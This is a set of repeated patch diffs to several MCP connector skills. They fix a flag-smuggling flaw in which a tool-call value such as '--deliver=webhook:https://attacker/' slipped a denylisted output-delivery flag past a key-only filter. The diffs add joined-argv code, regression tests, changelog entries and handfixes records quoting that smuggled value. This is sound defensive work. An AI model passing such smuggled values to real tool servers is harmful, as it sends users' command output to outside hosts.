 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/pax8/handfixes.json
+++ b/skills/pax8/handfixes.json
@@ -292,6 +292,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/pax8/handfixes.json
+++ b/skills/pax8/handfixes.json
@@ -307,8 +307,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -318,7 +330,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/pipedrive/CHANGELOG.md
+++ b/skills/pipedrive/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/pipedrive/CHANGELOG.md
+++ b/skills/pipedrive/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/pipedrive/CHANGELOG.md
+++ b/skills/pipedrive/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/pipedrive/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/pipedrive/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/pipedrive/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/pipedrive/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/pipedrive/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/pipedrive/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/pipedrive/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/pipedrive/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/pipedrive/handfixes.json
+++ b/skills/pipedrive/handfixes.json
@@ -187,6 +187,35 @@
      "not_contains": "'2030-01-01', 0, 7"
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/pipedrive/handfixes.json
+++ b/skills/pipedrive/handfixes.json
@@ -202,8 +202,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -213,7 +225,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/proofpoint/CHANGELOG.md
+++ b/skills/proofpoint/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/proofpoint/CHANGELOG.md
+++ b/skills/proofpoint/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/proofpoint/CHANGELOG.md
+++ b/skills/proofpoint/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/proofpoint/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/proofpoint/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/proofpoint/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/proofpoint/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/proofpoint/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/proofpoint/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/proofpoint/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/proofpoint/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
